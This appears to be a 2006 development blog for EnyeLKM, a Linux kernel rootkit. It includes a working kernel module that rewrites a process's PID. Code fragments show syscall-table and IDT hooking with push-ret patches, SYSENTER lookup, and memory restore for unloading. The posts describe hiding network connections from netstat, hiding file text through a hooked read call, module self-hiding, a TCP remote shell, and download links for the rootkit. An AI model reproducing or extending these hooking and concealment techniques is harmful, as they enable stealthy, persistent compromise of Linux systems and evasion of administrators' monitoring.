EnyeLKM blog

(To understand what I am about to explain I recommend to read Understanding The Linux Kernel (3rd Edition))

Now that I have some spare time for EnyeLKM, I will explain how to change the PID to a process in an easy way.

The method used is to run the process descriptor with the for_each_process macro to find the corresponding with a PID X that would be changed for another one.
(I recommend to researcht: task struct).

LKM to change a PID of a process:
/*
Project : EnyeLKM priv8 version
Module : Swapper DEMO (Fistconference Version)
Autor : David Reguera Garcia
-
Update : 28 November 2006
-
The spinlocks has been removed in this POC :P
*/

#include “Swapper.h”

static int pid_to_find = 0;
static int pid_to_change = 0;

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,5,47)
MODULE_PARM( pid_to_find , “i” );
MODULE_PARM( pid_to_change , “i” );
#else
module_param( pid_to_find , int, S_IRUGO );
module_param( pid_to_change , int, S_IRUGO );
#endif

int init_module( void )
{
struct task_struct * actual_task;

if ( ( pid_to_find == 0 ) || ( pid_to_change == 0 ) )
{
printk( KERN_INFO “Swapper Syntax: pid_to_find=pid pid_to_change=pid.\n” );
return -1;
}

for_each_process( actual_task )
{
if ( actual_task->pid == pid_to_find )
{
printk( KERN_INFO “Found process: %d.\n”, actual_task->pid );
actual_task->pid = pid_to_change;
printk( KERN_INFO “Change to: %d.\n”, actual_task->pid );
return 0;
}
}
printk( KERN_INFO “Not found process: %d.\n”, pid_to_find );
return -1;
}

void cleanup_module( void )
{
printk( KERN_INFO “Swapper descargado\n” );
}

/* EOF */

Code (LKMs) with scripts to facilitate the job:

swapping_and_list_pids_from_pd.tar.gz

Blogs visitors that want to coperate with the development of enyelkm or to be able to post comments can send an email to:
Dreg@fr33project.org

Must especify the reason why they want to coperate or to be able to post comments and what can they contribute with to the blog

Notice: all the emails could not be answered. Not all the users could take part of the development or contribute with comments to the blog.

The blog has been totally translated to english by delcoyote. Many, many thanks for all the working hours spent to make it possible.

From now on when a comment or post is written it is RECOMMENDED, to do it inspanish and english, to do it we just need to write (the spaces inside the tabs “[ ]” must be DELETED):

[ lang_en ] Text in english [ /lang_en ]
[ lang_es ] Same text in spanish [ /lang_es ]

This way the information can be delivered to much more people.

Hi.
I almost have finished the new remote access connection hiding system. Before it was done all messy by redirecting read’s syscall, what would sometimes cause errors when doing a netstat. Now I will do it redirecting the function that /proc/net/tcp shows (tcp_seq_show I think it was called), I already redirected it, only need to make the new one that will check if the ip is the one that has to be hidden or not, etc. In a couple of days or less I think it will be ready, there was no need for a slapdash because the symbol to get it redirected is exported. Later when its finished it has to be added to the uninstall module because it has to be left like it was, if not when we do a netstat, it will jump to our function that does not exist and the process will fail.
Greetings.

December 10th, 2006
Hello.
With the less pager, when a file is readed containing hidden text between the corresponding labels, there is an strange behaviour: when is readed for first time or when scrolling downwards, the text comes out hidden; when scrolling backwards, the text is visible.
This can be reproduced continuously doing an up and down scroll over less same execution.
The stdout of a complete strace execution (without filter options) of less reproducing this behaviour with the same README.txt of LKM and its example of hidding:

# strace less LEEME.txt

Version less: 394
Version kernel (kernel.org): 2.6.18
Greetings.
Comments:
David Reguera García
_____________________
Hello Nethox, welcome to the blog, it is a pleasure to have you around. In my opinion what should be done is to filter through offset, to do a sort of table with ranks, from the offsets were there is hidden text and when trying to read that offset putting the pointer at the frontor behind the hidden text (depending were are we trying to read). So you avoid accesing to the file content, also a redirection should be done or something for when the hidden text file is saved is rewritten again with the new hidden text. Would this be viable? Would it be interesting to investigate it? Any other ideas? you decide :-). Greetings.
Greetings.
]]–>
RaiSe
__________________________
Hi.The hooked syscal of read only checks the size marks inside the buffer that read will read, in example if the program executes read(pepe, buf, 1024) the hacked_read reads those 1024 bytes, cheks if the marks are there, and if they are it deletes them, and the new buffer is what gives back to user space. So if a program is doing reads byte by byte the hidding does not work, and small size reads are being done were in one same read the marks are not read also. Greetings.
RaiSe how are you getting on with the shell through TCP? have you done something else? you can upload your releases or segments of code if you like :-).

http://www.fr33project.org/projects/enyelkm-1.1.4-fix.rar

Fixed the problem of hacked_read (atomit_t) for the download, and fixed the version in
Makefile.

In the next version swapper will be implemented :-).

P.D.: The download till the reads are not finished it will not be possible because if it was not done this way the syslogd messages would be noticed a lot.

http://www.fr33project.org/projects/enyelkm-1.1.4.rar

New module: restore_memory.c, The module is capable of saving the overwritten memory by the jumps to restore them later when the module loads (before it was not possible to load it).

create_push_ret( & push_ret, (unsigned long) new_idt );
save_memory( (unsigned long) p, & backup_memory );
write_push_ret( ( void *) p, & push_ret );

LKM’s cleanup function:
restore_memory( & backup_memory );
__dev_remove_pack( & my_pkt );
/* let processes that are ‘reading’ finish*/
while ( read_activo != 0 || can_unload_lkm != 1 )
schedule();

Modification at idt:
void new_idt( void )
{
can_unload_lkm = 0;
….
can_unload_lkm = 1;
JmPushRet( after_call )
…

The traffic light is used just in case any redirected system calls are being executed.
P.D.: To try it comment the function hide_module().

http://www.fr33project.org/projects/enyelkm-1.1.3.rar

EnyeLKM 1.1.2 obtains the SYSENTER at execution time with the instruction: rdmsr( MSR_IA32_SYSENTER_EIP, psysenter_entry, v2 ); it does not give a single warning when doing a make!!!

Also all base.c has been reprogrammed and two new modules have been created:
extern_symbols: were functions exist to obtain external symbols to LKM, for example:
/* thx to Int27h :-). */
void * get_sysenter_entry( void )
{
void * psysenter_entry = NULL ;
unsigned long v2 ;
if ( boot_cpu_has( X86_FEATURE_SEP ) )
rdmsr( MSR_IA32_SYSENTER_EIP, psysenter_entry, v2 );
else
return NULL;
return psysenter_entry;
}

Also the module lowlevel_layer has been created: thanks to this module we can abstract ourselves quite a lot with the modules that search in opcodes memory and rest of the functions, for example:
void set_idt_handler( void * system_call )
{
unsigned char * p;
push_ret_t push_ret;
p = (unsigned char *) system_call;
/* first jump */
while ( !is_jnb_opcode( (unsigned char *) p ) )
p ++;
p -= DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB;
create_push_ret( & push_ret, (unsigned long) new_idt );
write_push_ret( ( void *) p, & push_ret )
…

And before this looked like:
void set_idt_handler(void *system_call)
{
unsigned char *p;
unsigned long *p2;
p = (unsigned char *) system_call;
/* first jump */
while (!((*p == 0×0f) && (*(p+1) == 0×83)))
p++;
p -= 5;
*p++ = 0×68;
p2 = (unsigned long *) p;
*p2++ = (unsigned long) new_idt;
p = (unsigned char *) p2;
*p = 0xc3;

As we can apreciate now is much more easier to abstract ourselves of the problem thanks to the “lowlevel” layer.
The next thing I will develop its the possible unload of the module, another module for the memory management with WRITTING-AND-RESTORE for its load will have to be created at least

¿What do you think RaiSe? ¿Do you like it?

http://www.fr33project.org/projects/enyelkm-1.1.2.rar

You can implement whatever you want from the easy-hook version.

¿Do you think its ok?

I have added myself to the credits, ¿shall I get off them?

P.D.: SYSENTER has to be implemented as Int27h said, plus to improve the cat’s made to makefile, because is not very elegant (among other things)

After having parked the project for so long we are back again:-), RaiSe: ¿Are you around?